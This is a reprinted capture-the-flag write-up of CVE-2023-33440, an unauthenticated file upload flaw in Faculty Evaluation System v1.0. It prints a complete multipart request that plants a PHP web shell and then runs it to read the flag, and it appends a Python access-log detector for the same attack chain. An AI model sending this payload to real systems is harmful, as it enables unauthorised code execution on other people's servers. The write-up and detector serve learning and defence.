

CVE-2023-33440 (Arbitrary File Upload)

Overview

Faculty Evaluation System v1.0 has an unauthenticated arbitrary file upload vulnerability

Steps

Open the target environment

Run a directory scan

Found the back-end login.php; open it to take a look

Tried weak passwords; none worked, so no way in that route

According to the hint this is an unauthenticated file upload, so the vulnerability should be triggerable without logging in; go straight to capturing the request

The PoC is as follows

POST /ajax.php?action=update_user HTTP/1.1
Host: XXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://XXX/index.php?page=report
Content-Length: 750
Content-Type: multipart/form-data; boundary=---------------------------166782539326470
Connection: close
 
-----------------------------166782539326470
Content-Disposition: form-data; name="id"
 
1
-----------------------------166782539326470
Content-Disposition: form-data; name="firstname"
 
Administrator
-----------------------------166782539326470
Content-Disposition: form-data; name="lastname"
 
a
-----------------------------166782539326470
Content-Disposition: form-data; name="email"
 
[email protected]
-----------------------------166782539326470
Content-Disposition: form-data; name="password"
 
admin
-----------------------------166782539326470
Content-Disposition: form-data; name="img"; filename="php.php"
Content-Type: application/octet-stream
 
<?php system("cat /flag");?>
-----------------------------166782539326470--

Capture the request locally, then change the IP

After capturing it, send the packet as shown in the figure

Packet sent successfully

Access the shell

http://xxx/assets/uploads/1721405880_php.php

Got flag{4a73a5b5-f582-4070-8229-dc447aae57c5}
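As an added defensive example (not part of the original post), the following Python check runs over constructed Apache access-log lines and flags the request pattern this writeup describes: a POST to ajax.php?action=update_user followed by a successful fetch of a script-extension file from /assets/uploads/ with the <epoch>_<name> shape seen above. The log lines, IP addresses and file names are constructed; the extension list is an assumption about which suffixes the web server would execute.

```python
import re

# Constructed Apache combined-format access-log lines (not from the original post);
# IPs are from documentation ranges and the timestamps and upload names are made up.
SAMPLE_LOG = """\
203.0.113.5 - - [19/Jul/2024:15:38:00 +0000] "POST /ajax.php?action=update_user HTTP/1.1" 200 4 "-" "Mozilla/5.0"
203.0.113.5 - - [19/Jul/2024:15:38:03 +0000] "GET /assets/uploads/1721405880_php.php HTTP/1.1" 200 45 "-" "Mozilla/5.0"
198.51.100.7 - - [19/Jul/2024:15:40:11 +0000] "POST /ajax.php?action=update_user HTTP/1.1" 200 4 "-" "Mozilla/5.0"
198.51.100.7 - - [19/Jul/2024:15:40:12 +0000] "GET /assets/uploads/1721406012_avatar.jpg HTTP/1.1" 200 12034 "-" "Mozilla/5.0"
192.0.2.9 - - [19/Jul/2024:15:41:00 +0000] "GET /assets/uploads/1721406060_x.phtml HTTP/1.1" 200 10 "-" "curl/8.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Vulnerable endpoint and the upload path shape from the writeup (assets/uploads/<epoch>_<name>);
# the executable-extension list is an assumption about the server's PHP handler mapping.
UPDATE_USER_RE = re.compile(r'^/ajax\.php\?(?:.*&)?action=update_user(?:&|$)')
UPLOAD_SCRIPT_RE = re.compile(r'^/assets/uploads/\d+_.+\.(?:php\d?|phtml|phar)$', re.IGNORECASE)

CHAIN = "update_user POST followed by script fetched from /assets/uploads/"
SERVED = "script extension served from /assets/uploads/"


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def find_upload_abuse(log_text):
    """Return (ip, path, reason) for each successful fetch of a script file from the
    uploads directory, noting when the same client called update_user earlier."""
    uploaders = set()
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["method"] == "POST" and UPDATE_USER_RE.match(rec["path"]):
            uploaders.add(rec["ip"])
        elif rec["method"] == "GET" and rec["status"] == "200" \
                and UPLOAD_SCRIPT_RE.match(rec["path"].split("?", 1)[0]):
            reason = CHAIN if rec["ip"] in uploaders else SERVED
            findings.append((rec["ip"], rec["path"], reason))
    return findings


if __name__ == "__main__":
    for ip, path, reason in find_upload_abuse(SAMPLE_LOG):
        print(f"{ip} {path}: {reason}")
```

A 200 response for a .php file under the uploads directory is itself a finding, since a hardened deployment would refuse to execute anything from that path regardless of how it got there.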


This article is reprinted from: https://blog.csdn.net/lkbzhj/article/details/140562474
Copyright belongs to the original author BTY@BTY. If there is any infringement, please contact us for removal.
